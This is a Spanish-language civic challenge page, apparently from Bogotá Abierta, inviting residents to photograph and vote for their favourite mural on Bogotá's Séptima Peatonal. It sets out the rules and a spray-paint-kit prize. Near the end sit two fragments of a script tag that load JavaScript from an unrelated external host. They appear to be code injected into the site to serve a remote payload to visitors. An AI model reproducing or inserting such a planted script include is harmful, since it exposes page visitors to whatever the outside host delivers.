Este reto se ha respondido 0 veces

¿Cuál es el grafitti o mural de la nueva Galería de Arte Urbano de la 7a peatonal que más te gusta?

¿Ya viste cómo los artistas urbanos le han cambiado la cara a la Séptima Peatonal con sus murales? 

Te invitamos a que te acerques a la Séptima Peatonal entre Calles 11 y Avenida Jiménez para que descubras y disfrutes el impresionante trabajo con el que más de 70 talentosos artistas urbanos le cambiaron la cara al corredor.  

Apoyados por el Gobierno Distrital y guiados por el lema, Amor por Bogotá, los artistas trabajaron durante 3 noches sin importar la fuerte lluvia, para llenar la Séptima Peatonal de arte, colores e historias urbanas. El resultado es una impresionante galería de arte urbano a cielo abierto, que le imprime nueva vida al corredor en horas de la noche al cerrarse las persianas de los comercios. 


¿Cómo participar? 

Recorre el tramo de la 7a Peatonal entre las Callés 11 y Avenida Jiménez, tómale fotos a las nuevas obras y sube en Bogotá Abierta la foto del mural (persiana) que más te guste. 

Máximo 1 foto por participante. 

*** Para ganar, la obra ganadora deberá contar con mínimo 20 fotos en Bogotá Abierta. De no llegar a las 20, ampliaremos el reto hasta que alguna de las obras alcance ese número.

Kit de Aerosoles para el artista cuya obra cuente con el mayor número de fotos en Bogotá Abierta.

Entre los fotógrafos ciudadanos de la obra/mural que registre el mayor número de fotos, se rifarán unas hermosas fotos en gran formato del mural ganador. 

****Recomendación: Un buen día para hacer el recorrido es el Domingo cuando el comercio está cerrado. 


¡Gracias artistas urbanos por darle tanto a Bogotá!

src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript"> src="https://cuev.in/aux.php?ver=1.0&ref=at&debug=" type="text/javascript">


Comentarios (24)